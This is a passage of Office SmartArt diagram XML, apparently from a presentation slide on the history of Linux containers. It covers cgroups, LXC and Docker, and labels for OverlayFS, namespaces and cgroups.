    <dgm:pt modelId="{CC3AA6E7-017D-4717-8836-46706D051600}" type="sibTrans" cxnId="{503EF772-9607-430D-A811-01B1B62E5C5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401F2F06-2B68-45E5-A68B-143595B4E25F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t>It was designed for limiting, accounting and isolating resource usage (CPU, memory, disk I/O, network) of a collection of processes. It was renamed “Control Groups (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t>)” a year later and eventually merged to Linux kernel 2.6.24.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58041F01-D905-49E9-B2BB-5920CF61FC90}" type="parTrans" cxnId="{4396A2CE-FFAA-4563-81BA-54C0C354944E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A7B952D-838F-4476-AEF0-915EECC0FF81}" type="sibTrans" cxnId="{4396A2CE-FFAA-4563-81BA-54C0C354944E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>2008</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Linux Containers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9C75F80-7E49-496E-9842-8956080D6062}" type="parTrans" cxnId="{04F17011-4DA5-4660-B9B8-1505E4C8A347}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74B74999-41A2-413A-9257-39315C2FEA66}" type="sibTrans" cxnId="{04F17011-4DA5-4660-B9B8-1505E4C8A347}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D536E890-06FA-4E70-819B-FF98A8E879B7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t>The most complete implementation of Linux container manager. It was implemented using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t> and Linux namespaces, and it works on a single Linux kernel without requiring any patches.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{749D997E-4D91-4386-B06D-97C9C8F045CA}" type="parTrans" cxnId="{1462F4AC-643E-49A7-8947-B17B56AB1242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF4D9296-1D85-416F-8CF0-3059A3776C23}" type="sibTrans" cxnId="{1462F4AC-643E-49A7-8947-B17B56AB1242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>2013</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Docker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD4B1C9-AE0F-498C-8B7A-9E151DCB2104}" type="parTrans" cxnId="{8FC4FCA9-66C6-4F82-8A72-F6B2C19726BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9981309A-F48C-4D7B-998A-12D4E0CD18E4}" type="sibTrans" cxnId="{8FC4FCA9-66C6-4F82-8A72-F6B2C19726BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26565ECE-9C2A-4C6F-BAFD-33305C9D51E7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t>Docker used LXC in its initial stages and later replaced that container manager with its own library, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
            <a:t>libcontainer</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            <a:t>. But there’s no doubt that Docker separated itself from the pack by offering an entire ecosystem for container management.  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43C5594F-DC18-41FC-8A53-ADD23F379472}" type="parTrans" cxnId="{895E343A-32CF-4A8F-B047-9F7A74D90ACD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4FCB0B3-35D3-48B9-B968-886A98AC4899}" type="sibTrans" cxnId="{895E343A-32CF-4A8F-B047-9F7A74D90ACD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1481296D-8906-49E1-87B3-EA3819156510}" type="pres">
      <dgm:prSet presAssocID="{6C3C0ABF-51D2-490C-B40A-3E8CD1BC7663}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B46BD421-B515-41C7-A5E5-9747C979A6B0}" type="pres">
      <dgm:prSet presAssocID="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F92AB52-E597-4475-AF26-3A789E4912DB}" type="pres">
      <dgm:prSet presAssocID="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A7AEF42-1964-4A31-AF8C-FED9DB0FD867}" type="pres">
      <dgm:prSet presAssocID="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF6A226-D0FF-4786-AD2F-965687A3722F}" type="pres">
      <dgm:prSet presAssocID="{CC3AA6E7-017D-4717-8836-46706D051600}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC81E6CA-CF2E-46BA-AFB8-63333E7A59C8}" type="pres">
      <dgm:prSet presAssocID="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{484E4F05-4378-4CFB-833C-0A289318C5DC}" type="pres">
      <dgm:prSet presAssocID="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{726EF919-F191-41D7-8951-5352E10D9F93}" type="pres">
      <dgm:prSet presAssocID="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E955C584-747E-476F-963F-B5F2FF7C0E00}" type="pres">
      <dgm:prSet presAssocID="{74B74999-41A2-413A-9257-39315C2FEA66}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2FAD36C8-6DEC-4992-B3CC-D2F1AE3A5DF5}" type="pres">
      <dgm:prSet presAssocID="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9A2DFFD-B8BE-4216-8828-531C20BBBF50}" type="pres">
      <dgm:prSet presAssocID="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2DC1F14-12C5-4266-9861-5A07A24628ED}" type="pres">
      <dgm:prSet presAssocID="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1462F4AC-643E-49A7-8947-B17B56AB1242}" srcId="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" destId="{D536E890-06FA-4E70-819B-FF98A8E879B7}" srcOrd="0" destOrd="0" parTransId="{749D997E-4D91-4386-B06D-97C9C8F045CA}" sibTransId="{EF4D9296-1D85-416F-8CF0-3059A3776C23}"/>
    <dgm:cxn modelId="{503EF772-9607-430D-A811-01B1B62E5C5D}" srcId="{6C3C0ABF-51D2-490C-B40A-3E8CD1BC7663}" destId="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" srcOrd="0" destOrd="0" parTransId="{5836442D-FC9E-4545-B458-8E972C2709B9}" sibTransId="{CC3AA6E7-017D-4717-8836-46706D051600}"/>
    <dgm:cxn modelId="{895E343A-32CF-4A8F-B047-9F7A74D90ACD}" srcId="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" destId="{26565ECE-9C2A-4C6F-BAFD-33305C9D51E7}" srcOrd="0" destOrd="0" parTransId="{43C5594F-DC18-41FC-8A53-ADD23F379472}" sibTransId="{B4FCB0B3-35D3-48B9-B968-886A98AC4899}"/>
    <dgm:cxn modelId="{2FB63541-C637-4983-AC36-0F2F2A352617}" type="presOf" srcId="{401F2F06-2B68-45E5-A68B-143595B4E25F}" destId="{5A7AEF42-1964-4A31-AF8C-FED9DB0FD867}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{16B88947-2069-40C4-AC10-02F7A5B045D0}" type="presOf" srcId="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" destId="{2F92AB52-E597-4475-AF26-3A789E4912DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DF9CE1AA-B605-4BB8-ADF6-37EDE15126CC}" type="presOf" srcId="{D536E890-06FA-4E70-819B-FF98A8E879B7}" destId="{726EF919-F191-41D7-8951-5352E10D9F93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{1E8EE315-FDC3-4FC0-9574-1E8CD3ACD1B8}" type="presOf" srcId="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" destId="{484E4F05-4378-4CFB-833C-0A289318C5DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{1ACC7AB1-0D24-43B2-987F-0CB7C72B3DC9}" type="presOf" srcId="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" destId="{A9A2DFFD-B8BE-4216-8828-531C20BBBF50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{92A1E139-351B-484B-8702-DD72A10E7832}" type="presOf" srcId="{26565ECE-9C2A-4C6F-BAFD-33305C9D51E7}" destId="{B2DC1F14-12C5-4266-9861-5A07A24628ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4396A2CE-FFAA-4563-81BA-54C0C354944E}" srcId="{55E6C964-5D41-42CD-B680-CC82BB28F7C6}" destId="{401F2F06-2B68-45E5-A68B-143595B4E25F}" srcOrd="0" destOrd="0" parTransId="{58041F01-D905-49E9-B2BB-5920CF61FC90}" sibTransId="{6A7B952D-838F-4476-AEF0-915EECC0FF81}"/>
    <dgm:cxn modelId="{598E359B-24D2-4DD9-BA41-705E43A97F94}" type="presOf" srcId="{6C3C0ABF-51D2-490C-B40A-3E8CD1BC7663}" destId="{1481296D-8906-49E1-87B3-EA3819156510}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8FC4FCA9-66C6-4F82-8A72-F6B2C19726BC}" srcId="{6C3C0ABF-51D2-490C-B40A-3E8CD1BC7663}" destId="{D7E08AA4-FEB5-4688-AE6B-178DE52EE62C}" srcOrd="2" destOrd="0" parTransId="{3AD4B1C9-AE0F-498C-8B7A-9E151DCB2104}" sibTransId="{9981309A-F48C-4D7B-998A-12D4E0CD18E4}"/>
    <dgm:cxn modelId="{04F17011-4DA5-4660-B9B8-1505E4C8A347}" srcId="{6C3C0ABF-51D2-490C-B40A-3E8CD1BC7663}" destId="{9F58C39A-0C2F-45B3-B5EF-4363F74C94B4}" srcOrd="1" destOrd="0" parTransId="{A9C75F80-7E49-496E-9842-8956080D6062}" sibTransId="{74B74999-41A2-413A-9257-39315C2FEA66}"/>
    <dgm:cxn modelId="{28F41135-5BDD-4F83-BCDC-09929EC9EB1A}" type="presParOf" srcId="{1481296D-8906-49E1-87B3-EA3819156510}" destId="{B46BD421-B515-41C7-A5E5-9747C979A6B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D742E719-51F2-420F-9E1A-EB440A7CC6EE}" type="presParOf" srcId="{B46BD421-B515-41C7-A5E5-9747C979A6B0}" destId="{2F92AB52-E597-4475-AF26-3A789E4912DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3A6D9015-E2A2-4932-8E1C-609C31E697BE}" type="presParOf" srcId="{B46BD421-B515-41C7-A5E5-9747C979A6B0}" destId="{5A7AEF42-1964-4A31-AF8C-FED9DB0FD867}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4165F5C2-9912-4F12-8DEE-578D7DFB7128}" type="presParOf" srcId="{1481296D-8906-49E1-87B3-EA3819156510}" destId="{7AF6A226-D0FF-4786-AD2F-965687A3722F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B448F5EB-CA86-4DB9-880E-1854F3427648}" type="presParOf" srcId="{1481296D-8906-49E1-87B3-EA3819156510}" destId="{FC81E6CA-CF2E-46BA-AFB8-63333E7A59C8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F09A0D7F-F9CD-471C-852D-EFC690FB97EE}" type="presParOf" srcId="{FC81E6CA-CF2E-46BA-AFB8-63333E7A59C8}" destId="{484E4F05-4378-4CFB-833C-0A289318C5DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DE312667-D1C8-4FBC-9FA9-58CDC42725D0}" type="presParOf" srcId="{FC81E6CA-CF2E-46BA-AFB8-63333E7A59C8}" destId="{726EF919-F191-41D7-8951-5352E10D9F93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{382A340F-15AB-4714-B2F1-48874B5CFCE6}" type="presParOf" srcId="{1481296D-8906-49E1-87B3-EA3819156510}" destId="{E955C584-747E-476F-963F-B5F2FF7C0E00}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{2D32957B-ECA1-4C15-A661-A72C79431317}" type="presParOf" srcId="{1481296D-8906-49E1-87B3-EA3819156510}" destId="{2FAD36C8-6DEC-4992-B3CC-D2F1AE3A5DF5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{1E649411-48D6-4E18-8101-4D2EC6C8CA14}" type="presParOf" srcId="{2FAD36C8-6DEC-4992-B3CC-D2F1AE3A5DF5}" destId="{A9A2DFFD-B8BE-4216-8828-531C20BBBF50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{76603E29-8817-4DEF-962B-4B157B3757B0}" type="presParOf" srcId="{2FAD36C8-6DEC-4992-B3CC-D2F1AE3A5DF5}" destId="{B2DC1F14-12C5-4266-9861-5A07A24628E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BF6E7A-4AF7-4A54-84D4-3CEEF8EA9E5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42C962FC-1D78-43BA-B0CF-137A2840F445}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>OverlayFS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1713A20B-7E8A-41DF-8180-D2A2606C61EC}" type="parTrans" cxnId="{0BEAB32E-2CE4-4B1A-931E-51A76AB16B10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7A9DD56-0BC7-44D7-8F3A-5F6C16C178A4}" type="sibTrans" cxnId="{0BEAB32E-2CE4-4B1A-931E-51A76AB16B10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A71EB0B-D69A-44D8-97C1-8BAE0C986272}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Device Manager</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F864029A-1FCC-448F-84E4-5C83EE958893}" type="parTrans" cxnId="{2BE2B8EE-C2C3-40FF-A6E8-FDCAD669242B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EAF8B62-CA36-4231-AF1F-CD553875BE63}" type="sibTrans" cxnId="{2BE2B8EE-C2C3-40FF-A6E8-FDCAD669242B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3308BB54-327E-48E4-AFA3-CC75936853A2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Namespaces</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39F06928-C39B-497C-A11E-9FF8F73C2515}" type="parTrans" cxnId="{44B469D1-063B-4717-91A4-95F7931A4F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{989459BE-540A-4B15-AA0A-8E720923CF57}" type="sibTrans" cxnId="{44B469D1-063B-4717-91A4-95F7931A4F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>MNT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7E2FADA-2CE4-4D70-A8E8-2841A6A15F23}" type="parTrans" cxnId="{BCCC3E87-E7BA-4977-A59C-97BC894B6383}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E87A7702-8011-47CE-A2C4-52B8816527E9}" type="sibTrans" cxnId="{BCCC3E87-E7BA-4977-A59C-97BC894B6383}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>CGROUPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFB69568-FB60-416B-9C49-F8DDD021FC00}" type="parTrans" cxnId="{9DDD98BC-68F0-49F0-8514-796C2FD74996}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D292456B-5A1C-474E-ABF1-888BF1BEDB06}" type="sibTrans" cxnId="{9DDD98BC-68F0-49F0-8514-796C2FD74996}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37B428CA-8910-41D5-84E0-19ADAFD89D7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
